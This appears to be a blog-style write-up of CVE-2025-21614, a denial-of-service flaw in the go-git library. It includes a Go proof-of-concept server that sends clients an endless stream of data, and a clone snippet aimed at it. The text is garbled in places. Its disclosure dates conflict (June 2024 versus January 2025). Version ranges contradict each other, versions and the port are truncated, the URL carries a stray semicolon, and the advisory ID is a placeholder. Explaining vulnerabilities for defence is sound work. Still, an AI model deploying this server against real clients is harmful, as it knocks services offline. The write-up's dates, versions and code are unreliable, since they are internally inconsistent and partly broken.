On June 4, 2024, a denial of service (DoS) vulnerability was made public for go-git—a powerful library used in many Go projects to interact with Git repositories. Identified as CVE-2025-21614, this flaw impacts users of go-git v4 up to (but not including) v5.13. In practical terms, malicious actors can crash applications or consume server resources by serving specially crafted responses from a Git server, causing client-side resource exhaustion.
This article explains CVE-2025-21614 in simple words, shows how it can be exploited, and tells you how to fix and protect your systems.
What is go-git?
go-git is a pure Go library for working with Git repositories. It’s used in CI/CD tools, IDEs, code review tools, and custom Git clients written in Go.
Its extensibility, zero external dependencies, and ease of use made it popular for server-side Git operations in cloud-native environments.
What Happened?
A security researcher found that some code paths in go-git did not do enough to enforce proper resource usage when talking to a Git server. If the library received a “valid-looking but malicious” response—like one with huge line lengths, open-ended streams, or excessive objects—it could cause:
Application slowdown or crash
For example, a bad actor could set up a Git server (or HTTP middlebox) that replied to go-git clients with oversized or endless data chunks, overwhelming the process.
Users on v5.13 or later
- Users of other Git implementations (e.g., libgit2, native Git CLI, or gopkg.in/src-d/go-git.v4 which is an older, deprecated fork)
How Could an Attacker Exploit This?
An attacker needs to control a Git server (or MITM proxy) and serve malicious responses to go-git clients. This can look like:
1. A clone/fetch URL points to the attacker’s Git server.
2. go-git opens a fetch/clone connection.
The server sends back huge packets, infinite streams, or carefully malformed data.
4. The go-git process allocates piles of memory or enters an infinite loop, eventually crashing or hanging.
Proof of Concept
Below is a basic exploit scenario. This is for educational and defensive purposes only.
Malicious Server Example
Here’s a simple Go net/http server that pretends to be a Git fat-pack response, sending gigabytes of nonsense data endlessly:
package main
import (
"net/http"
"io"
"log"
)
func maliciousGit(w http.ResponseWriter, r *http.Request) {
// Set headers like a real Git server
w.Header().Set("Content-Type", "application/x-git-upload-pack-result")
// Write infinitely (causing go-git to buffer ~forever)
for {
// Write 1MB blocks
_, err := w.Write(make([]byte, 1024*1024))
if err != nil {
break
}
}
}
func main() {
http.HandleFunc("/malicious-endpoint", maliciousGit)
log.Println("Serving malicious endpoint on :808")
log.Fatal(http.ListenAndServe(":808", nil))
}
Below is a snippet for a go-git-based clone
package main
import (
"log"
git "github.com/go-git/go-git/v5"
)
func main() {
_, err := git.PlainClone("/tmp/repo", false, &git.CloneOptions{
URL: "http://localhost:808/malicious-endpoint";,
})
if err != nil {
log.Fatal(err)
}
}
Launching the above clone against the malicious server often results in excessive memory use and crashes—potentially taking down your whole service.
Simple Fix: Upgrade Now!
The go-git maintainers took action by restricting stream lengths and adding checks to protect against overlong or malformed responses, releasing the fix in v5.13.
`bash
go get github.com/go-git/go-git/v5@v5.13.
References & Further Reading
- go-git Security Advisory GHSA-xxxx-xxxx-xxxx
- Release notes for go-git v5.13.
- NVD entry for CVE-2025-21614
- go-git Documentation
Summary
- CVE-2025-21614 makes go-git deny service when connecting to malicious Git servers, in versions *v4.x, up to v5.12*.
Always validate your dependencies and keep third-party libraries up-to-date!
Stay safe and protect your Go applications from the latest supply chain and desync attacks.
Timeline
Published on: 01/06/2025 17:15:47 UTC